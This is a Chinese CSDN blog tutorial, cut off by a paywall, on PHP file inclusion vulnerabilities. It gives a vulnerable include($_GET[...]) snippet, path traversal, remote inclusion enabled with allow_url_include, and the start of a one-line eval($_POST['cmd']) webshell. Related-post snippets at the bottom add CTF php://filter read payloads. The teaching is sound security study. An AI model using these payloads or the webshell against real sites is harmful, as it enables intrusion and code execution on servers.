文件包含漏洞file_include

最新推荐文章于 2024-04-25 13:59:04 发布
最新推荐文章于 2024-04-25 13:59:04 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 漏洞利用 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43536831/article/details/104757595
版权

什么是文件包含?

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含

几个文件包含函数及特点

include函数
当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。

include_once函数
功能与include()相同,但程序只调用一次

require函数
require()与include()的区别在于require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。

require_once函数
功能与require()相同,但程序只调用一次

常见的文件包含漏洞代码

<?php $filename = $_GET['filename']; include($filename); ?>

这样就可以去读取一个文件
payload: ?filename=xxx.xxx

一般是使用相对路径
相对当前文件的另一个文件的位置
…/即前往上一级
要回到根目录可以使用多个…/

本地文件包含

被包含的文件在服务器本地

利用方式

包含本地敏感文件, 上传文件

远程文件包含

利用方式

包含远程攻击者指定远程url文件

被包含的文件在远程服务端
要php.ini配置为允许远程包含
5.x版本之后默认为关闭状态

若要进行远程文件包含测试

在php.ini中修改allow_url_include=On

远程文件包含payload: ?page=xxx.xxx.xxx.xxx/phpinfo.php

xxx为你要远程包含的ip地址

远程包含写入一句话木马

<?php $payload = "<?php eval(\$_POST['cmd'])?>";

m y f i l e = f o p e n ( ′ d e m o . p h p

最低0.47元/天 解锁文章
CMACCKK
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3261
攻防世界 -- fileinclude
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
file_include-data
Kobalos的博客
12-02 3028
<?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){ //如果file参数中存在这么多元素就显示errer die("error"); } include($file); }else{ highlight_file(_
Web漏洞-文件包含漏洞超详细全解(附实例)_【web漏洞百例】
2401_84215240的博客
04-25 1152
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…4.因为这里展示的是show.php文件,因此我们想到直接去访问show.php文件,可以看到当我们直接访问show.php时,网站返回的也是同样的内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Fileinclude
淡巴枯的博客
09-20 497
可以看出lan的值是从cookie中传来的。然后lan进了条件判断,由于非lan,所以包含的是english.php页面。但我们要去flag.php页面,此时继续向下看,可以看到@include($lan.“.php”);也就是说lan存在则会将lan的值拼接.php然后进行包含。因此,我们要对language赋值,构造payload。
fileinclude
陈艺秋的博客
07-10 884
看题目提示,应该是一道文件包含的题目,打开环境后直接告诉我flag在flag.php里但是因为不知道绝对路径,不能直接利用file读取查看源码后,发现里面嵌入了一段php代码。
FileInclude
hee_mee的博客
01-07 1298
zeronil
信息安全技术:远程文件包含漏洞.pptx
11-01
远程文件包含漏洞(Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非预期的外部文件,从而可能对系统造成严重...
Mang0-php文件包含漏洞.zip
03-12
然而,这些特性如果不慎使用,可能会导致安全问题,其中之一就是“文件包含漏洞”。本文将深入探讨"Mang0-php文件包含漏洞"这一主题,以及如何防范此类安全风险。 ### 文件包含漏洞基础 文件包含漏洞是由于不安全...
文件包含原理解释-require
最新发布
05-13
不恰当的文件包含可能导致远程文件包含漏洞(RFI,Remote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含的文件路径是可信的,并避免用户...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含漏洞可以分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。本地文件包含是指包含的文件在本地服务器上,而远程文件包含是指包含的文件在远程服务器上。远程...
HTML中include file标签的用法
热门推荐
软件工程 plus 人工智能
01-18 1万+
  参数  PathType  将 FileName 的路径类型。路径可为以下某种类型:  路径类型 含义  文件 该文件名是带有 #include 命令的文档所在目录的相对路径。被包含文件可位于相同目录或子目录中;但它不能处于带有 #include 命令的页的上层目录中。  虚拟 文件名为 Web 站点上虚拟目录的完整虚拟路径。  FileName  指定要包含的文件名。FileName 必须包
File Include
qq_39536716的博客
04-26 263
文件包含类型的题目 学习网址 文件包含 150 解题方式 使用php://filter协议读取index文件 payload:http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=./index.php 需要对file后面的内容做一些修改 本地包...
Xctf之file_include
qq_40646572的博客
10-11 1150
进入给的地址,看到这个源码,首先想到,使用php伪协议进行读取,flag.php文件,直接filename = php://filter/read=convert.base64-encode/resource=flag.php,发现提示个上述图片中的一样,然后使用string.rot13编码,还是无法绕过,正好在查找关于php伪协议的时候,看到一篇关于php://filter以及死亡绕过。尝试下,发现可以。ok,完成。
攻防世界-file_include
m0_49025459的博客
12-18 6811
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
【攻防世界】file_include
m0_74979597的博客
09-13 1522
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
file_include(攻防世界)
m0_56107268的博客
11-14 6992
php转化器的学习
file_include(江苏工匠杯)
szhangliwenya的博客
03-19 61
文件包含:开发人员一般会把重复使用的函数写到单个文件中,当需要使用这个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。那正常来说包含的文件是固定的、写死的就不会存在文件包含漏洞,但是这样的话又不够便捷,所以开发人员为了使代码调用更加灵活,就会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,允许用户从客户端提交一个变量值来作为文件包含的变量值,当这个值是段恶意代码时,并且服务端又没有对用户的输入进行一个很好的过滤,就会造成文件包含漏洞。Base64编码的内容。
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1414
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
攻防世界新手file_include
06-01
"file_include" 是一种常见的 Web 漏洞类型之一,攻击者可以利用这种漏洞来包含并执行服务器上的文件。在攻防世界中,您可以通过学习 Web 安全知识来了解如何利用此类漏洞进行攻击和防御。建议您先学习一些基本的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值